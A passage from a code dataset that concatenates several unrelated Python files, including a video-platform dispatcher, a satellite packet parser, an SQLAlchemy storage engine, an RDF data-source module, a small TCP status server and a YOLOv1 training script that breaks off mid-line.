'youtube update'),\n        'unpublish': partial(test_mode_action, 'youtube unpublish'),\n        'delete': partial(test_mode_action, 'youtube delete')\n    },\n    'youtube_direct': {\n        'upload': partial(test_mode_action, 'youtube_direct upload'),\n        'update': partial(test_mode_action, 'youtube_direct update'),\n        'unpublish': partial(test_mode_action, 'youtube_direct unpublish'),\n        'delete': partial(test_mode_action, 'youtube_direct delete')\n    }\n}\n\nclass PlatformInteraction(object):\n    def __init__(self):\n        if config.property('test_mode'):\n            self.registered_platforms = test_mode_platforms\n        else:\n            self.registered_platforms = registered_platforms\n\n    def execute_platform_interaction(self, platform, interaction, video, registry_model):\n        if platform in self.registered_platforms and interaction in self.registered_platforms[platform]:\n            self.registered_platforms[platform][interaction](video, registry_model)\n        else:\n            # supply the format arguments so the message actually names the missing platform/interaction\n            raise Exception('Target platform %s with interaction %s does not exist!' % (platform, interaction))\n","sub_path":"connector/platforms.py","file_name":"platforms.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"496074619","text":"\nimport datetime\nimport time\nimport os\n\nfrom CCITT_CRC16 
import CRCfromString\n\n\nclass BIRDpacket(object):\n    def __init__(self, strin, filename):\n        \"\"\"\n        given a line in a string input it as a packet\n        \"\"\"\n        dt = datetime.datetime.strptime(os.path.basename(filename)[0:10], '%Y-%m-%d')\n        hour, minute, second, millisecond = strin.split(' - ')[0].split(':')\n        self.grt = datetime.datetime(dt.year, dt.month, dt.day, int(hour),\n                                     int(minute), int(second), int(millisecond)*100)\n        self.raw = strin.split(' - ')[1]\n        self.srcid = self.raw.split()[1:3]\n        self.destid = self.raw.split()[3:5]\n        self.cmd_tlm = self.raw.split()[5]\n        self.funid = self.raw.split()[6]\n        self.seqnum = self.raw.split()[7] # number of pages in request\n        self.seqidx = self.raw.split()[8] # counts up to self.seqnum \n        self.pktnum = self.raw.split()[9] # packet within page, goes up to 0x13 for each page (last could end early)\n        self.datalen = self.raw.split()[10] # can be sorted for the last packet in a page\n        self.data = self.raw.split()[11:11+int(self.datalen,16)]\n        self.crc = self.raw.split()[11+int(self.datalen, 16):11+int(self.datalen, 16)+2]\n        self.valid_crc = self._crc_valid()\n\n    def __eq__(self, other):\n        attrs = ['data', 'srcid', 'destid']\n        for a in attrs:\n            if getattr(self, a) != getattr(other, a):\n                return False\n        return True\n    \n    def _crc_valid(self):\n        \"\"\"\n        if the calculated CRC matches what is in the packet True, False otherwise\n        \"\"\"\n        calc_crc = CRCfromString(' '.join(self.raw.split(' ')[1:-3])).upper()\n        if calc_crc[2:4].upper() == self.crc[0].upper() and \\\n           calc_crc[4:6].upper() == self.crc[1].upper():\n            return True\n        else:\n            return False\n\n    def __str__(self):\n        return('BIRDpacket: GRT: {0} Len:{1}'.format(self.grt.isoformat(), int(self.datalen, 16)))\n\n    __repr__ = __str__\n\n\nclass BIRDpackets(list):\n    \"\"\"\n    make a list of all the BIRDpacket instances in a file\n    \"\"\"\n    def __init__(self, infile):\n        \"\"\"\n        given a filename parse into many BIRDpacket instances\n        \"\"\"\n        super(BIRDpackets, self).__init__()\n        with open(infile, 'r') as fp:\n            dat = fp.readlines()\n        dat = [v.strip() for v in dat]\n        self.filename = infile\n        # make this class a list of BIRDpacket objects\n        self.extend([BIRDpacket(v, self.filename) for v in dat])\n    \n    def __str__(self):\n        # count the packets whose CRC check failed (summing valid_crc over failed packets always gave 0)\n        return(\"{0} packets: {1} bad CRC\".format(len(self), sum(1 for v in self if not v.valid_crc)))\n\n    __repr__ = __str__\n","sub_path":"L0toL1/packet.py","file_name":"packet.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"115858828","text":"#!/usr/bin/python3\n\"\"\"This module defines a class to manage database storage for hbnb clone\"\"\"\nimport MySQLdb\nfrom sqlalchemy.orm import sessionmaker, scoped_session, Session\nfrom models.base_model import BaseModel, Base\nimport os\nfrom sqlalchemy.engine import create_engine\nfrom models.base_model import BaseModel\nfrom models.user import User\nfrom models.place import Place\nfrom models.state import State\nfrom models.city import City\nfrom models.amenity import Amenity\nfrom models.review import Review\n\n\nclass DBStorage:\n    \"\"\"class DBStorage\"\"\"\n    __engine = None\n    __session = None\n\n    def __init__(self):\n        \"\"\"__init__\"\"\"\n        username = os.getenv('HBNB_MYSQL_USER')\n        password = os.getenv('HBNB_MYSQL_PWD')\n        host = os.getenv('HBNB_MYSQL_HOST')\n        database = os.getenv('HBNB_MYSQL_DB')\n        self.__engine = create_engine('mysql+mysqldb://{}:{}@{}/{}'.format(\n            username, password, host, database), pool_pre_ping=True)\n        if 
os.getenv('HBNB_ENV') == 'test':\n Base.metadata.drop_all(self.__engine)\n\n def all(self, cls=None):\n \"\"\"Returns a dictionary of models currently in storage\"\"\"\n classes = {\n 'BaseModel': BaseModel, 'User': User, 'Place': Place,\n 'State': State, 'City': City, 'Amenity': Amenity,\n 'Review': Review\n }\n result = {}\n if cls in classes:\n objs = self.__session.query(classes[cls]).all()\n for obj in objs:\n key = '{}.{}'.format(obj.__class__.__name__, obj.id)\n result[key] = obj\n elif cls is None:\n for clas in classes:\n query = self.__session.query(classes[clas]).all()\n for obj in query:\n key = '{}.{}'.format(obj.__class__.__name__, obj.id)\n result[key] = obj\n return result\n\n def new(self, obj):\n \"\"\"new\"\"\"\n if obj:\n self.__session.add(obj)\n\n def save(self):\n \"\"\"save\"\"\"\n self.__session.commit()\n\n def delete(self, obj=None):\n \"\"\"delete\"\"\"\n if obj is not None:\n self.__session.delete(obj)\n\n def reload(self):\n \"\"\"reload\"\"\"\n Base.metadata.create_all(self.__engine)\n X = sessionmaker(bind=self.__engine, expire_on_commit=False)\n Session = scoped_session(X)\n self.__session = Session()\n\n def close(self):\n \"\"\"close\"\"\"\n self.__session.remove()","sub_path":"models/engine/db_storage.py","file_name":"db_storage.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"517857640","text":"#!/usr/bin/env python\n\"\"\"\nCompute expression in the defined landing intervals associated with counting units\n\"\"\"\n\nimport sys\nimport optparse\nfrom maps.exp import DGE\n\n################################################################################\n\ndef process_command_line(argv):\n if argv is None:\n argv = sys.argv[1:]\n \n usage = \"%s\\nusage: prog [options] f_read f_gtf\" % __doc__\n parser = optparse.OptionParser(usage, \n formatter=optparse.TitledHelpFormatter(width=178),\n add_help_option=True)\n \n parser.add_option(\"-t\", \"--type\", type=\"string\", dest=\"featuretype\",\n default = \"exon\", help = \"feature type (3rd column in GTF file)[exon]\")\n \n parser.add_option(\"-u\", \"--unit\", type=\"string\", dest=\"unit\",\n default = \"transcript_id\", help = \"GTF attribute as counting unit[transcript_id]\")\n\n parser.add_option(\"-o\", \"--outfile\", type=\"string\", dest=\"outfile\",\n help = \"out file name\")\n\n (options, args) = parser.parse_args()\n \n if len(args) != 2:\n parser.error('No required parameters')\n \n return options, args\n\n################################################################################\n\ndef main():\n options, args = process_command_line(None)\n f_read = args[0]\n f_gtf = args[1]\n \n dge = DGE(f_read, f_gtf, feature_type=options.featuretype, \n id_feature = \"gene_id\", id_count=options.unit)\n\n outhandle = sys.stdout\n if options.outfile:\n outhandle = open(options.outfile, \"w\")\n \n dge.count(outhandle)\n \n if options.outfile:\n outhandle.close()\n \n \nif __name__ == \"__main__\":\n main()\n\n","sub_path":"scripts/land2exp.py","file_name":"land2exp.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"355883243","text":"from __future__ import print_function\nimport sqlite3\nimport hashlib\nfrom rdflib import URIRef, Literal, Graph, Namespace, ConjunctiveGraph\nfrom rdflib.namespace import RDFS, RDF, NamespaceManager\nfrom datetime import datetime as DT\nimport datetime\nimport 
transaction\nimport os\nimport traceback\nimport logging\nfrom .utils import grouper\nfrom .configure import Configureable, Configure, ConfigValue\n\n__all__ = [\n    \"Data\",\n    \"DataUser\",\n    \"RDFSource\",\n    \"SerializationSource\",\n    \"TrixSource\",\n    \"SPARQLSource\",\n    \"SleepyCatSource\",\n    \"DefaultSource\",\n    \"ZODBSource\"]\n\nL = logging.getLogger(__name__)\n\n\n_B_UNSET = object()\n\n\nclass _B(ConfigValue):\n\n    def __init__(self, f):\n        self.v = _B_UNSET\n        self.f = f\n\n    def get(self):\n        if self.v is _B_UNSET:\n            self.v = self.f()\n\n        return self.v\n\n    def invalidate(self):\n        self.v = _B_UNSET  # reset to the unset sentinel so get() recomputes; None would never be recomputed\n\n    def __repr__(self):\n        if self.v is _B_UNSET:\n            return 'Thunk of ' + repr(self.f)\n        return repr(self.v)\n\n\nZERO = datetime.timedelta(0)\n\n\nclass _UTC(datetime.tzinfo):\n\n    \"\"\"UTC\"\"\"\n\n    def utcoffset(self, dt):\n        return ZERO\n\n    def tzname(self, dt):\n        return \"UTC\"\n\n    def dst(self, dt):\n        return ZERO\n\n\nutc = _UTC()\n\n\nclass DataUser(Configureable):\n\n    \"\"\" A convenience wrapper for users of the database\n\n    Classes which use the database should inherit from DataUser.\n    \"\"\"\n\n    def __init__(self, *args, **kwargs):\n        super(DataUser, self).__init__(*args, **kwargs)\n        self.__base_namespace = None\n\n    @property\n    def base_namespace(self):\n        if self.__base_namespace is not None:\n            return self.__base_namespace\n        return self.conf['rdf.namespace']\n\n    @base_namespace.setter\n    def base_namespace(self, value):\n        self.__base_namespace = value\n\n    @property\n    def rdf(self):\n        return self.conf['rdf.graph']\n\n    @property\n    def namespace_manager(self):\n        return self.conf.get('rdf.namespace_manager', None)\n\n    def _remove_from_store(self, g):\n        # Note the asymmetry with _add_to_store. You must add actual elements, but deletes\n        # can be performed as a query\n        for group in grouper(g, 1000):\n            temp_graph = Graph()\n            for x in group:\n                if x is not None:\n                    temp_graph.add(x)\n                else:\n                    break\n            s = \" DELETE DATA {\" + temp_graph.serialize(format=\"nt\") + \" } \"\n            L.debug(\"deleting. s = \" + s)\n            self.conf['rdf.graph'].update(s)\n\n    def _add_to_store(self, g, graph_name=False):\n        if self.conf['rdf.store'] == 'SPARQLUpdateStore':\n            # XXX With Sesame, for instance, it is probably faster to do a PUT over\n            # the endpoint's rest interface. 
Just need to do it for some common\n # endpoints\n\n try:\n gs = g.serialize(format=\"nt\")\n except Exception:\n gs = _triples_to_bgp(g)\n\n if graph_name:\n s = \" INSERT DATA { GRAPH \" + graph_name.n3() + \" {\" + gs + \" } } \"\n else:\n s = \" INSERT DATA { \" + gs + \" } \"\n L.debug(\"update query = \" + s)\n self.conf['rdf.graph'].update(s)\n else:\n gr = self.conf['rdf.graph']\n if self.conf['rdf.source'] == 'ZODB':\n transaction.commit()\n transaction.begin()\n for x in g:\n gr.add(x)\n if self.conf['rdf.source'] == 'ZODB':\n transaction.commit()\n transaction.begin()\n\n # infer from the added statements\n # self.infer()\n\n def infer(self):\n \"\"\" Fire FuXi rule engine to infer triples \"\"\"\n\n from FuXi.Rete.RuleStore import SetupRuleStore\n from FuXi.Rete.Util import generateTokenSet\n from FuXi.Horn.HornRules import HornFromN3\n # fetch the derived object's graph\n semnet = self.rdf\n rule_store, rule_graph, network = SetupRuleStore(makeNetwork=True)\n closureDeltaGraph = Graph()\n network.inferredFacts = closureDeltaGraph\n # build a network of rules\n for rule in HornFromN3('testrules.n3'):\n network.buildNetworkFromClause(rule)\n # apply rules to original facts to infer new facts\n network.feedFactsToAdd(generateTokenSet(semnet))\n # combine original facts with inferred facts\n for x in closureDeltaGraph:\n self.rdf.add(x)\n\n def add_reference(self, g, reference_iri):\n \"\"\"\n Add a citation to a set of statements in the database\n\n :param triples: A set of triples to annotate\n \"\"\"\n new_statements = Graph()\n ns = self.conf['rdf.namespace']\n for statement in g:\n statement_node = self._reify(new_statements, statement)\n new_statements.add(\n (URIRef(reference_iri),\n ns['asserts'],\n statement_node))\n\n self.add_statements(g + new_statements)\n\n def retract_statements(self, graph):\n \"\"\"\n Remove a set of statements from the database.\n\n :param graph: An iterable of triples\n \"\"\"\n self._remove_from_store_by_query(graph)\n\n def _remove_from_store_by_query(self, q):\n s = \" DELETE WHERE {\" + q + \" } \"\n L.debug(\"deleting. 
s = \" + s)\n        self.conf['rdf.graph'].update(s)\n\n    def add_statements(self, graph):\n        \"\"\"\n        Add a set of statements to the database.\n        Annotates the addition with uploader name, etc\n\n        :param graph: An iterable of triples\n        \"\"\"\n        self._add_to_store(graph)\n\n    def _reify(self, g, s):\n        \"\"\"\n        Add a statement object to g that binds to s\n        \"\"\"\n        n = self.conf['new_graph_uri'](s)\n        g.add((n, RDF['type'], RDF['Statement']))\n        g.add((n, RDF['subject'], s[0]))\n        g.add((n, RDF['predicate'], s[1]))\n        g.add((n, RDF['object'], s[2]))\n        return n\n\n\nclass Data(Configure):\n\n    \"\"\"\n    Provides configuration for access to the database.\n\n    Usually doesn't need to be accessed directly\n    \"\"\"\n\n    def __init__(self, conf=None, **kwargs):\n        \"\"\"\n        Parameters\n        ----------\n        conf : Configure\n            A Configure object\n        \"\"\"\n        super(Data, self).__init__(**kwargs)\n\n        if conf is not None:\n            self.copy(conf)\n        else:\n            self.copy(Configureable.default)\n        self.namespace = Namespace(\"http://openworm.org/entities/\")\n        self.molecule_namespace = Namespace(\"http://openworm.org/entities/molecules/\")\n        self['rdf.namespace'] = self.namespace\n        self['molecule_name'] = self._molecule_hash\n        self['new_graph_uri'] = self._molecule_hash\n\n    @classmethod\n    def load(cls, file_name):\n        \"\"\" Load a file into a new Data instance storing configuration in a JSON format \"\"\"\n        return cls.open(file_name)\n\n    @classmethod\n    def open(cls, file_name):\n        \"\"\" Load a file into a new Data instance storing configuration in a JSON format \"\"\"\n        return cls(conf=Configure.open(file_name))\n\n    def openDatabase(self):\n        self.init_database()\n\n    def init_database(self):\n        \"\"\" Open the configured database \"\"\"\n        self._init_rdf_graph()\n        L.debug(\"opening \" + str(self.source))\n        self.source.open()\n        nm = NamespaceManager(self['rdf.graph'])\n        self['rdf.namespace_manager'] = nm\n        self['rdf.graph'].namespace_manager = nm\n\n        # A runtime version number for the graph should update for all changes\n        # to the graph\n        self['rdf.graph.change_counter'] = 0\n\n        self['rdf.graph']._add = self['rdf.graph'].add\n        self['rdf.graph']._remove = self['rdf.graph'].remove\n        self['rdf.graph'].add = self._my_graph_add\n        self['rdf.graph'].remove = self._my_graph_remove\n        nm.bind(\"\", self['rdf.namespace'])\n\n    def _my_graph_add(self, triple):\n        self['rdf.graph']._add(triple)\n\n        # It's important that this happens _after_ the update otherwise anyone\n        # checking could think they have the latest version when they don't\n        self['rdf.graph.change_counter'] += 1\n\n    def _my_graph_remove(self, triple_or_quad):\n        self['rdf.graph']._remove(triple_or_quad)\n\n        # It's important that this happens _after_ the update otherwise anyone\n        # checking could think they have the latest version when they don't\n        self['rdf.graph.change_counter'] += 1\n\n    def closeDatabase(self):\n        \"\"\" Close the configured database \"\"\"\n        self.source.close()\n\n    def _init_rdf_graph(self):\n        # Set these in case they were left out\n        self['rdf.source'] = self.get('rdf.source', 'default')\n        self['rdf.store'] = self.get('rdf.store', 'default')\n        self['rdf.store_conf'] = self.get('rdf.store_conf', 'default')\n\n        # XXX:The conf=self can probably be removed\n        self.sources = {'sqlite': SQLiteSource,\n                        'sparql_endpoint': SPARQLSource,\n                        'sleepycat': SleepyCatSource,\n                        'default': DefaultSource,\n                        'trix': TrixSource,\n                        'serialization': SerializationSource,\n                        'zodb': ZODBSource}\n        source = self.sources[self['rdf.source'].lower()](conf=self)\n        self.source = source\n\n        self.link('semantic_net_new', 'semantic_net', 'rdf.graph')\n        self['rdf.graph'] = source\n        return source\n\n    def _molecule_hash(self, data):\n        return URIRef(\n            self.molecule_namespace[\n                hashlib.sha224(\n                    str(data)).hexdigest()])\n\n    def __setitem__(self, k, v):\n        return Configure.__setitem__(self, k, v)\n\n    def __getitem__(self, k):\n        return Configure.__getitem__(self, k)\n\n\ndef modification_date(filename):\n    t = os.path.getmtime(filename)\n    return datetime.datetime.fromtimestamp(t)\n\n\nclass RDFSource(Configureable, ConfigValue):\n\n    \"\"\" Base class for data sources.\n\n    Alternative sources should derive from this class\n    \"\"\"\n\n    def __init__(self, **kwargs):\n        super(RDFSource, self).__init__(**kwargs)\n        self.graph = False\n\n    def get(self):\n        if self.graph is False:\n            raise Exception(\n                \"Must call openDatabase on Data object before using the database\")\n        return self.graph\n\n    def close(self):\n        if self.graph is False:\n            return\n        self.graph.close()\n        self.graph = False\n\n    def open(self):\n        \"\"\" Called on ``PyOpenWorm.connect()`` to set up and return the rdflib graph.\n        Must be overridden by sub-classes.\n        \"\"\"\n        raise NotImplementedError()\n\n\nclass SerializationSource(RDFSource):\n\n    \"\"\" Reads from an RDF serialization or, if the configured database is more\n    recent, then from that.\n\n    The database store is configured with::\n\n        \"rdf.source\" = \"serialization\"\n        \"rdf.store\" = \n        \"rdf.serialization\" = \n        \"rdf.serialization_format\" = \n        \"rdf.store_conf\" = \n\n    \"\"\"\n\n    def open(self):\n        if not self.graph:\n            self.graph = True\n            import glob\n            # Check the ages of the files. Read the more recent one.\n            g0 = ConjunctiveGraph(store=self.conf['rdf.store'])\n            database_store = self.conf['rdf.store_conf']\n            source_file = self.conf['rdf.serialization']\n            file_format = self.conf['rdf.serialization_format']\n            # store_time only works for stores that are on the local\n            # machine.\n            try:\n                store_time = modification_date(database_store)\n                # If the store is newer than the serialization\n                # get the newest file in the store\n                for x in glob.glob(database_store + \"/*\"):\n                    mod = modification_date(x)\n                    if store_time < mod:\n                        store_time = mod\n            except Exception:\n                store_time = DT.min\n\n            trix_time = modification_date(source_file)\n\n            g0.open(database_store, create=True)\n\n            if store_time > trix_time:\n                # just use the store\n                pass\n            else:\n                # delete the database and read in the new one\n                # read in the serialized format\n                g0.parse(source_file, format=file_format)\n\n            self.graph = g0\n\n        return self.graph\n\n\nclass TrixSource(SerializationSource):\n\n    \"\"\" A SerializationSource specialized for TriX\n\n    The database store is configured with::\n\n        \"rdf.source\" = \"trix\"\n        \"rdf.trix_location\" = \n        \"rdf.store\" = \n        \"rdf.store_conf\" = \n\n    \"\"\"\n\n    def __init__(self, **kwargs):\n        SerializationSource.__init__(self, **kwargs)\n        h = self.conf.get('trix_location', 'UNSET')\n        self.conf.link('rdf.serialization', 'trix_location')\n        self.conf['rdf.serialization'] = h\n        self.conf['rdf.serialization_format'] = 'trix'\n\n\ndef _rdf_literal_to_gp(x):\n    return x.n3()\n\n\ndef _triples_to_bgp(trips):\n    # XXX: Collisions could result between the variable names of different\n    # objects\n    g = \" .\\n\".join(\" \".join(_rdf_literal_to_gp(x) for x in y) for y in trips)\n    return g\n\n\nclass SPARQLSource(RDFSource):\n\n    \"\"\" Reads from and queries against a remote data store\n\n    ::\n\n        \"rdf.source\" = \"sparql_endpoint\"\n    \"\"\"\n\n    def open(self):\n        # XXX: If we have a source that's read 
only, should we need to set the\n        # store separately??\n        g0 = ConjunctiveGraph('SPARQLUpdateStore')\n        g0.open(tuple(self.conf['rdf.store_conf']))\n        self.graph = g0\n        return self.graph\n\n\nclass SleepyCatSource(RDFSource):\n\n    \"\"\" Reads from and queries against a local Sleepycat database\n\n    The database can be configured like::\n\n        \"rdf.source\" = \"Sleepycat\"\n        \"rdf.store_conf\" = \n    \"\"\"\n\n    def open(self):\n        import logging\n        # XXX: If we have a source that's read only, should we need to set the\n        # store separately??\n        g0 = ConjunctiveGraph('Sleepycat')\n        self.conf['rdf.store'] = 'Sleepycat'\n        g0.open(self.conf['rdf.store_conf'], create=True)\n        self.graph = g0\n        logging.debug(\"Opened SleepyCatSource\")\n\n\nclass SQLiteSource(RDFSource):\n\n    \"\"\" Reads from and queries against a SQLite database\n\n    See the SQLite database :file:`db/celegans.db` for the format\n\n    The database store is configured with::\n\n        \"rdf.source\" = \"sqlite\"\n        \"sqldb\" = \"/home/USER/openworm/PyOpenWorm/db/celegans.db\",\n        \"rdf.store\" = \n        \"rdf.store_conf\" = \n\n    Leaving ``rdf.store`` unconfigured simply gives an in-memory data store.\n    \"\"\"\n\n    def open(self):\n        conn = sqlite3.connect(self.conf['sqldb'])\n        cur = conn.cursor()\n\n        # first step, grab all entities and add them to the graph\n        n = self.conf['rdf.namespace']\n\n        cur.execute(\"SELECT DISTINCT ID, Entity FROM tblentity\")\n        g0 = ConjunctiveGraph(self.conf['rdf.store'])\n        g0.open(self.conf['rdf.store_conf'], create=True)\n\n        for r in cur.fetchall():\n            # first item is a number -- needs to be converted to a string\n            first = str(r[0])\n            # second item is text\n            second = str(r[1])\n\n            # This is the backbone of any RDF graph. The unique\n            # ID for each entity is encoded as a URI and every other piece of\n            # knowledge about that entity is connected via triples to that URI\n            # In this case, we connect the common name of that entity to the\n            # root URI via the RDFS label property.\n            g0.add((n[first], RDFS.label, Literal(second)))\n\n        # second step, get the relationships between them and add them to the\n        # graph\n        cur.execute(\n            \"SELECT DISTINCT EnID1, Relation, EnID2, Citations FROM tblrelationship\")\n\n        gi = ''\n\n        i = 0\n        for r in cur.fetchall():\n            # all items are numbers -- need to be converted to a string\n            first = str(r[0])\n            second = str(r[1])\n            third = str(r[2])\n            prov = str(r[3])\n\n            ui = self.conf['molecule_name'](prov)\n            gi = Graph(g0.store, ui)\n\n            gi.add((n[first], n[second], n[third]))\n\n            g0.add([ui, RDFS.label, Literal(str(i))])\n            if (prov != ''):\n                g0.add([ui, n[u'text_reference'], Literal(prov)])\n\n            i = i + 1\n\n        cur.close()\n        conn.close()\n        self.graph = g0\n\n\nclass DefaultSource(RDFSource):\n\n    \"\"\" Reads from and queries against a configured database.\n\n        The default configuration.\n\n        The database store is configured with::\n\n            \"rdf.source\" = \"default\"\n            \"rdf.store\" = \n            \"rdf.store_conf\" = \n\n        Leaving unconfigured simply gives an in-memory data store.\n    \"\"\"\n\n    def open(self):\n        self.graph = ConjunctiveGraph(self.conf['rdf.store'])\n        self.graph.open(self.conf['rdf.store_conf'], create=True)\n\n\nclass ZODBSource(RDFSource):\n\n    \"\"\" Reads from and queries against a configured Zope Object Database.\n\n        If the configured database does not exist, it is created.\n\n        The database store is configured with::\n\n            \"rdf.source\" = \"ZODB\"\n            \"rdf.store_conf\" = \n\n        Leaving unconfigured simply gives an in-memory data store.\n    \"\"\"\n\n    def __init__(self, *args, **kwargs):\n        super(ZODBSource, 
self).__init__(*args, **kwargs)\n self.conf['rdf.store'] = \"ZODB\"\n\n def open(self):\n import ZODB\n from ZODB.FileStorage import FileStorage\n self.path = self.conf['rdf.store_conf']\n openstr = os.path.abspath(self.path)\n\n fs = FileStorage(openstr)\n self.zdb = ZODB.DB(fs, cache_size=1600)\n self.conn = self.zdb.open()\n root = self.conn.root()\n if 'rdflib' not in root:\n root['rdflib'] = ConjunctiveGraph('ZODB')\n self.graph = root['rdflib']\n try:\n transaction.commit()\n except Exception:\n # catch commit exception and close db.\n # otherwise db would stay open and follow up tests\n # will detect the db in error state\n L.warning('Forced to abort transaction on ZODB store opening')\n traceback.print_exc()\n transaction.abort()\n transaction.begin()\n self.graph.open(self.path)\n\n def close(self):\n if self.graph is False:\n return\n\n self.graph.close()\n\n try:\n transaction.commit()\n except Exception:\n # catch commit exception and close db.\n # otherwise db would stay open and follow up tests\n # will detect the db in error state\n traceback.print_exc()\n L.warning('Forced to abort transaction on ZODB store closing')\n transaction.abort()\n self.conn.close()\n self.zdb.close()\n self.graph = False\n","sub_path":"PyOpenWorm/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":19609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"631712949","text":"\"\"\"\nCopyright (C) 2013-2018 Calliope contributors listed in AUTHORS.\nLicensed under the Apache 2.0 License (see LICENSE file).\n\ndebug.py\n~~~~~~~~\n\nDebugging tools.\n\n\"\"\"\n\nfrom functools import reduce\nimport operator\n\nimport ruamel.yaml as ruamel_yaml\n\n\ndef get_from_dict(data_dict, map_list):\n return reduce(operator.getitem, map_list, data_dict)\n\n\ndef apply_to_dict(data_dict, map_list, func, args):\n getattr(get_from_dict(data_dict, map_list[:-1])[map_list[-1]], func)(*args)\n\n\ndef save_debug_data(model_run, debug_data, out_file):\n # README: currently based on ruamel.yaml 0.15 which is a mix of old\n # and new API - possibly needs a bit of rewriting once ruamel.yaml\n # has progressed a bit further\n yaml = ruamel_yaml.YAML()\n\n model_run_debug = model_run.copy()\n del model_run_debug['timeseries_data'] # Can't be serialised!\n\n # Turn sets in model_run into lists for YAML serialization\n for k, v in model_run_debug.sets.items():\n model_run_debug.sets[k] = list(v)\n\n debug_comments = debug_data['comments']\n debug_yaml = yaml.load(yaml.dump(model_run_debug.as_dict()))\n for k in debug_comments.model_run.keys_nested():\n v = debug_comments.model_run.get_key(k)\n keys = k.split('.')\n apply_to_dict(debug_yaml, keys[:-1], 'yaml_add_eol_comment', (v, keys[-1]))\n\n dumper = ruamel_yaml.dumper.RoundTripDumper\n dumper.ignore_aliases = lambda self, data: True\n\n with open(out_file, 'w') as f:\n ruamel_yaml.dump(\n debug_yaml, f,\n Dumper=dumper, default_flow_style=False\n )\n","sub_path":"calliope/core/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"364358316","text":"import threading, SocketServer, pickle, time, numpy\nimport socket\n\nclass TCPHandler(SocketServer.BaseRequestHandler):\n def handle(self):\n # self.request is the TCP socket connected to the client\n self.data = self.request.recv(1024).strip()\n # Check is present in dictionary\n if self.data == \"log\":\n 
self.request.send(self.server.log)\n            return\n        if self.data == \"monitor\":\n            self.request.send(pickle.dumps(self.server.values))\n            return\n        \n        try:\n            self.response = self.server.commands[self.data]()\n            self.request.send(self.response)\n        except:\n            self.request.send(self.server.log)\n\ndef server(host = \"\", port = 9999, commands= {'log': 0}):\n    #HOST, PORT = \"192.168.5.24\", 9999\n    # Create the server, binding to localhost on port 9999\n    server = SocketServer.TCPServer((host, port), TCPHandler)\n    server_thread = threading.Thread(target=server.serve_forever)\n    server_thread.start()\n    \n    server.log = \"\"\n    server.values = []\n    \n    return server\n\ndef connect(command, host, port = 9999):\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.connect((host, port))\n    s.send(command)\n    data = s.recv(2**15)\n    \n    # close the socket before returning; the close previously sat after the return and never ran\n    s.close()\n    return data\n    \n    \nif __name__ == '__main__':\n    s = server()\n    i = 0\n    while True:\n        i = i +1\n        time.sleep(0.3)\n        s.values = [numpy.linspace(i,i+2,3),numpy.linspace(i-5,i+2-5,3),]\n    ","sub_path":"control/inst_server.py","file_name":"inst_server.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"142809225","text":"# import library\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\nimport torchvision.transforms as transforms\nimport torch.optim as optim\nimport torchvision\nimport glob\nimport os\nimport numpy as np\nimport pandas as pd\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport datetime\n\n# import self-made function\nfrom dataset import hw2DataSet\nfrom models import Yolov1_vgg16bn\nfrom yoloLoss import yoloLoss\n\n#############################\n#1. Creating a custom dataset\n#############################\n#[2]\n# load the trainset and testset\ntrainset = hw2DataSet(root='../hw2_train_val/train15000/',\n                     transform=transforms.ToTensor())\ntestset = hw2DataSet(root='../hw2_train_val/val1500/',\n                     transform=transforms.ToTensor())\nprint('# images in trainset:', len(trainset))\nprint('# images in testset:', len(testset))\n\n\n#[3]\n# Use the torch dataloader to iterate through the dataset\ntrainset_loader = DataLoader(trainset, batch_size=16, shuffle=True, num_workers=4)\ntestset_loader = DataLoader(testset, batch_size=16, shuffle=False, num_workers=4)\n# get some random training images\ndataiter = iter(trainset_loader)\nimages, labels = dataiter.next()\nprint('Image tensor in each batch:', images.shape, images.dtype)\nprint('Label tensor in each batch:', labels.shape, labels.dtype)\n\n\n#[4]\n# We can visualize what each batch contains:\n# functions to show an image\ndef imshow(img):\n    npimg = img.numpy() # transfer torch to numpy\n    plt.imshow(np.transpose(npimg, (1, 2, 0))) #if using numpy image transferred from torch\n# functions to show an image's label in 7x7x26\ndef labelshow(img_number):\n    for patchi in range(7):\n        for patchj in range(7):\n            print (patchi,patchj,labels[img_number][patchi][patchj])\n\n# show images and label\n'''imshow(torchvision.utils.make_grid(images))\nlabelshow(0)\nplt.show()'''\n\n\n###########################################\n#2. 
Creating a Convolutional Neural Network\n###########################################\n#[5]\n# Use GPU if available, otherwise stick with cpu\nuse_cuda = torch.cuda.is_available()\ntorch.manual_seed(123)\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\nprint('Device used:', device)\n\n\n#[6]\n# import model from model.py\nmodel = Yolov1_vgg16bn(pretrained=True).to(device) # Remember to move the model to \"device\"\nprint(model)\nlogfile = open('log.txt', 'w')\n\ndef load_checkpoint(checkpoint_path, model,optimizer):\n state = torch.load(checkpoint_path) # for cuda\n #state = torch.load(checkpoint_path, map_location=device) #for cpu\n model.load_state_dict(state['state_dict'])\n optimizer.load_state_dict(state['optimizer'])\n print('model loaded from %s' % checkpoint_path)\n\n#####################\n#3. Train the network\n#####################\n#[7]\n# define the training loop\ndef train(model, epoch, log_interval=10):\n learning_rate = 0.002\n optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, momentum=0.9, weight_decay=5e-4)\n criterion = yoloLoss(5,0.05)\n #criterion = nn.MSELoss()\n load_checkpoint(\"map0799/best.pth\",model,optimizer)\n best_test_loss = np.inf\n iteration = 0 # one iteration would go through a ep\n for ep in 